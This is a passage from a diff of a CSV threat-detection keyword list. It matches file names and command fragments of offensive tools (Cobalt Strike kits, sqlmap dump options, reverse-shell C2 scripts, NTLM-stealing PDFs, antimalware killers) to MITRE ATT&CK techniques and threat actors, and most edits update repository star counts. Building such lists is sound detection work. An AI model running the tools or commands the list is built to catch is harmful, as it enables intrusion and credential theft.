T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/0xthirteen/StayKit","1","0","N/A","10","10","448","81","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z" +"*Backdoor LNK*","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Persistence","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/0xthirteen/StayKit","1","0","N/A","10","10","449","81","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z" "*Backdoor.*","offensive_tool_keyword","backdoor keyword","keyword observed in multiple backdoor tools","T1037.001 - T1037.002 - T1003.001 - T1001.002 - T1055.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tools","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*backdoor.asp*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","28282","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" -"*backdoor.aspx*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","28282","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" -"*backdoor.jsp*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","28282","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" -"*backdoor.php*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","28282","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" +"*backdoor.asp*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" +"*backdoor.aspx*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" +"*backdoor.jsp*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" +"*backdoor.php*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" "*BackdoorableScript*","offensive_tool_keyword","boko","boko.py is an application scanner for macOS that searches for and identifies potential dylib hijacking and weak dylib vulnerabilities for application executables as well as scripts an application may use that have the potential to be backdoored","T1195 - T1078 - T1079 - T1574","TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/bashexplode/boko","1","1","N/A","N/A","1","59","12","2021-09-28T22:36:01Z","2020-05-22T21:46:33Z" "*--backdoor-all*","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas","1","0","N/A","10","10","594","117","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" -"*BackdoorLNK*","offensive_tool_keyword","StayKit","StayKit - Cobalt Strike persistence kit - StayKit is an extension for Cobalt Strike persistence by leveraging the execute_assembly function with the SharpStay .NET assembly. The aggressor script handles payload creation by reading the template files for a specific execution type.","T1059 - T1053 - T1124","TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/0xthirteen/StayKit","1","1","N/A","N/A","10","448","81","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z" -"*backdoorlnkdialog*","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Persistence","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/0xthirteen/StayKit","1","1","N/A","10","10","448","81","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z" +"*BackdoorLNK*","offensive_tool_keyword","StayKit","StayKit - Cobalt Strike persistence kit - StayKit is an extension for Cobalt Strike persistence by leveraging the execute_assembly function with the SharpStay .NET assembly. The aggressor script handles payload creation by reading the template files for a specific execution type.","T1059 - T1053 - T1124","TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/0xthirteen/StayKit","1","1","N/A","N/A","10","449","81","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z" +"*backdoorlnkdialog*","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Persistence","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/0xthirteen/StayKit","1","1","N/A","10","10","449","81","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z" "*backstab.exe*","offensive_tool_keyword","Backstab","A tool to kill antimalware protected processes","T1107 - T1106 - T1543.004 ","TA0002 - TA0004 ","N/A","N/A","Defense Evasion","https://github.com/Yaxser/Backstab","1","1","N/A","N/A","10","1237","216","2021-06-19T20:01:52Z","2021-06-15T16:02:11Z" "*Backstab.sln*","offensive_tool_keyword","Backstab","A tool to kill antimalware protected processes","T1107 - T1106 - T1543.004 ","TA0002 - TA0004 ","N/A","N/A","Defense Evasion","https://github.com/Yaxser/Backstab","1","1","N/A","N/A","10","1237","216","2021-06-19T20:01:52Z","2021-06-15T16:02:11Z" "*backstab.x64.*","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/KDStab","1","1","N/A","10","10","146","35","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z" @@ -7547,7 +7693,7 @@ "*BadgerStrlen*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*BadgerWcscmp*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*BadgerWcslen*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" -"*Bad-Pdf*","offensive_tool_keyword","Bad-PDF","Bad-PDF create malicious PDF file to steal NTLM(NTLMv1/NTLMv2) Hashes from windows machines. it utilize vulnerability disclosed by checkpoint team to create the malicious PDF file. Bad-Pdf reads the NTLM hashes using Responder listener.","T1566.001 - T1189 - T1068 - T1207 - T1048 - T1003","TA0001 - TA0002 - TA0003 - TA0009 - TA0010 - TA0011","N/A","N/A","Credential Access","https://github.com/deepzec/Bad-Pdf","1","1","N/A","N/A","10","980","213","2020-08-19T06:54:51Z","2018-04-29T15:21:35Z" +"*Bad-Pdf*","offensive_tool_keyword","Bad-PDF","Bad-PDF create malicious PDF file to steal NTLM(NTLMv1/NTLMv2) Hashes from windows machines. it utilize vulnerability disclosed by checkpoint team to create the malicious PDF file. Bad-Pdf reads the NTLM hashes using Responder listener.","T1566.001 - T1189 - T1068 - T1207 - T1048 - T1003","TA0001 - TA0002 - TA0003 - TA0009 - TA0010 - TA0011","N/A","N/A","Credential Access","https://github.com/deepzec/Bad-Pdf","1","1","N/A","N/A","10","981","214","2020-08-19T06:54:51Z","2018-04-29T15:21:35Z" "*BadPotato.cs*","offensive_tool_keyword","Earth Lusca Operations Tools ","Earth Lusca Operations Tools and commands","T1203 - T1218 - T1027 - T1064 - T1029 - T1210 - T1090","TA0007 - TA0008","N/A","N/A","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/BeichenDream/BadPotato","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*BadPotato.exe*","offensive_tool_keyword","cobaltstrike","Erebus CobaltStrike post penetration testing plugin","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/DeEpinGh0st/Erebus","1","1","N/A","10","10","1356","214","2021-10-28T06:20:51Z","2019-09-26T09:32:00Z" "*badpotato.exe*","offensive_tool_keyword","Earth Lusca Operations Tools ","Earth Lusca Operations Tools and commands","T1203 - T1218 - T1027 - T1064 - T1029 - T1210 - T1090","TA0007 - TA0008","N/A","N/A","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/BeichenDream/BadPotato","1","1","N/A","N/A","","N/A","","","" @@ -7558,32 +7704,32 @@ "*BadUSB_HideWindow.ino*","offensive_tool_keyword","Pateensy","payload for teensy like a rubber ducky but the syntax is different. this Human interfaes device ( HID attacks ). Penetration With Teensy","T1025 T1052","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/Pateensy","1","1","N/A","N/A","2","132","64","2017-01-26T12:02:56Z","2016-03-21T07:29:38Z" "*BadUSB_LockYourComputer.ino*","offensive_tool_keyword","Pateensy","payload for teensy like a rubber ducky but the syntax is different. this Human interfaes device ( HID attacks ). Penetration With Teensy","T1025 T1052","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/Pateensy","1","1","N/A","N/A","2","132","64","2017-01-26T12:02:56Z","2016-03-21T07:29:38Z" "*BadZure-main*","offensive_tool_keyword","badazure","BadZure orchestrates the setup of Azure Active Directory tenants populating them with diverse entities while also introducing common security misconfigurations to create vulnerable tenants with multiple attack paths","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/mvelazc0/BadZure/","1","1","N/A","5","4","302","18","2023-07-27T15:40:41Z","2023-05-05T04:52:21Z" -"*bananaKitten.exe*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","175","34","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" -"*BaRMIe*","offensive_tool_keyword","BaRMIe","BaRMIe is a tool for enumerating and attacking Java RMI (Remote Method Invocation) services.","T1522 - T1070 - T1573 - T1071","TA0001 - TA0003 - TA0008 - TA0011","N/A","N/A","Information Gathering","https://github.com/NickstaDB/BaRMIe","1","0","N/A","N/A","7","691","107","2017-09-28T22:38:02Z","2017-09-24T18:54:12Z" +"*bananaKitten.exe*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" +"*BaRMIe*","offensive_tool_keyword","BaRMIe","BaRMIe is a tool for enumerating and attacking Java RMI (Remote Method Invocation) services.","T1522 - T1070 - T1573 - T1071","TA0001 - TA0003 - TA0008 - TA0011","N/A","N/A","Information Gathering","https://github.com/NickstaDB/BaRMIe","1","0","N/A","N/A","7","692","107","2017-09-28T22:38:02Z","2017-09-24T18:54:12Z" "*baron-samedit-heap-based-overflow-sudo.txt*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" "*base64_conversion_commands.ps1*","offensive_tool_keyword","RunasCs","RunasCs is an utility to run specific processes with different permissions than the user's current logon provides using explicit credential","T1055 - T1134.001","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","1","N/A","N/A","8","722","107","2023-05-20T01:19:52Z","2019-08-08T20:18:18Z" "*base64_conversion_commands.ps1*","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version of windows builtin runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs/","1","1","N/A","6","8","722","107","2023-05-20T01:19:52Z","2019-08-08T20:18:18Z" -"*bash lse.sh*","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","N/A","9","10","2924","535","2023-09-17T10:27:49Z","2019-02-13T11:02:21Z" +"*bash lse.sh*","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","N/A","9","10","2925","535","2023-09-17T10:27:49Z","2019-02-13T11:02:21Z" "*bash_executor *","offensive_tool_keyword","mythic","mythic C2 agent","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/freyja/","1","0","N/A","10","10","11","6","2023-06-30T16:35:47Z","2022-09-28T17:20:04Z" -"*bash_read_line_reverse_tcp.py*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3252","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" +"*bash_read_line_reverse_tcp.py*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3255","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" "*bashfuscator -*","offensive_tool_keyword","Bashfuscator","A fully configurable and extendable Bash obfuscation framework","T1027 - T1027.004 - T1059 - T1059.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Bashfuscator/Bashfuscator","1","0","N/A","10","10","1348","159","2023-09-05T10:40:25Z","2018-08-03T21:25:22Z" "*Bashfuscator Team*","offensive_tool_keyword","Bashfuscator","A fully configurable and extendable Bash obfuscation framework","T1027 - T1027.004 - T1059 - T1059.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Bashfuscator/Bashfuscator","1","0","N/A","10","10","1348","159","2023-09-05T10:40:25Z","2018-08-03T21:25:22Z" "*bashfuscator.py*","offensive_tool_keyword","Bashfuscator","A fully configurable and extendable Bash obfuscation framework","T1027 - T1027.004 - T1059 - T1059.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Bashfuscator/Bashfuscator","1","1","N/A","10","10","1348","159","2023-09-05T10:40:25Z","2018-08-03T21:25:22Z" "*Bashfuscator-master*","offensive_tool_keyword","Bashfuscator","A fully configurable and extendable Bash obfuscation framework","T1027 - T1027.004 - T1059 - T1059.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Bashfuscator/Bashfuscator","1","1","N/A","10","10","1348","159","2023-09-05T10:40:25Z","2018-08-03T21:25:22Z" -"*BasicServiceExploit.class*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*BasicServiceExploit.class*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*BastilleResearch*","offensive_tool_keyword","Github Username","Open source testing tools for the SDR & security community","T1179 - T1141 - T1142 - T1143","TA0011 - ","N/A","N/A","Exploitation tools","https://github.com/BastilleResearch","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*--batch --dump -T *","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","28282","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" +"*--batch --dump -T *","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" "*Bates.exe --kill*","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Dendrobate","1","0","N/A","10","2","122","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z" "*Bates.exe --listen*","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Dendrobate","1","0","N/A","10","2","122","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z" "*bats3c/ADCSPwn*","offensive_tool_keyword","ADCSPwn","A tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service","T1550.002 - T1078.003 - T1110.003","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/bats3c/ADCSPwn","1","1","N/A","10","8","749","119","2023-03-20T20:30:40Z","2021-07-30T15:04:41Z" "*bats3c/darkarmour*","offensive_tool_keyword","darkarmour","Store and execute an encrypted windows binary from inside memorywithout a single bit touching disk.","T1055.012 - T1027 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/bats3c/darkarmour","1","1","N/A","10","7","644","119","2020-04-13T10:56:23Z","2020-04-06T20:48:20Z" -"*bats3c/DarkLoadLibrary*","offensive_tool_keyword","DarkLoadLibrary","LoadLibrary for offensive operations","T1071.001 - T1055.002 - T1055.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bats3c/DarkLoadLibrary","1","1","N/A","10","9","874","184","2021-10-22T07:27:58Z","2021-06-17T08:33:47Z" +"*bats3c/DarkLoadLibrary*","offensive_tool_keyword","DarkLoadLibrary","LoadLibrary for offensive operations","T1071.001 - T1055.002 - T1055.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bats3c/DarkLoadLibrary","1","1","N/A","10","9","875","184","2021-10-22T07:27:58Z","2021-06-17T08:33:47Z" "*bats3c/EvtMute*","offensive_tool_keyword","EvtMute","This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log","T1562.004 - T1055.001 - 